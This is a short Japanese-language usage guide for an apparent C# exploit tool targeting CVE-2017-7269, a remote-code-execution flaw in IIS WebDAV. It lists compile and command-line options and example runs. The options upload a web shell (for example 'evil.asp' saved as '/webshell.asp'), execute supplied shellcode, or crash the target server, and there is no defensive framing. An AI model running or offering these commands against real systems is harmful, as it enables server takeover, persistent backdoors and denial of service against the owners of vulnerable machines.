
CVE-2017-7269 をウェブシェルまたはシェルコードローダーに
csc cve-2017-7269.cs
CVE-2017-7269 <url> [parms]
Header:
-h <host> [If] ヘッダーのホストを設定
-p <port> [If] ヘッダーのポートを設定
-s <scheme> [If] ヘッダーのスキームを設定
-l <length> 物理パスの長さ
WebShell:
-w <webshell> ウェブシェルをサーバーにアップロード
-wp <shellpath> 保存するウェブシェルのパス
ShellCode:
-c <shellcode> シェルコードを実行
その他:
-t 脆弱性のテストのみ行う。
-e getshell またはテスト時にプロセスを終了
-k ターゲットを強制終了(-e と -t と同じ)
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin